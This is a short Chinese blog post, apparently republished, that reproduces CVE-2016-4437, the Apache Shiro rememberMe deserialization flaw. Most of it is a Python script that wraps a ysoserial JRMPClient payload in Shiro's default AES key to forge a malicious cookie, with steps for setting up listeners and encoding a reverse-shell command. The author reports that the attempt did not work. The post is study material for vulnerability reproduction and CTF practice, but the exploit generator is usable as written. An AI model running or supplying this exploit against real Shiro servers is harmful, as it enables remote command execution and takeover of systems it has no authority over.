Apache shiro cve-2016-4437复现
作者:互联网
漏洞描述
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
漏洞条件
shiro版本 <=1.2.4
漏洞复现
抓包发现,有rememberMe=deleteMe,判断是shiro。。
反弹shell编码网站https://www.jackson-t.ca/runtime-exec-payloads.html
使用ysoserial监听端口
本地监听端口
然后修改Cookie,将下面脚本生成的payload,再次发包。
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
但是,没有任何反应。。。。。。。
练习题目可以看看----红明谷21的javaweb
参考
标签:__,AES,base64,subprocess,4437,BS,Apache,import,cve 来源: https://www.cnblogs.com/OutBxx/p/15864909.html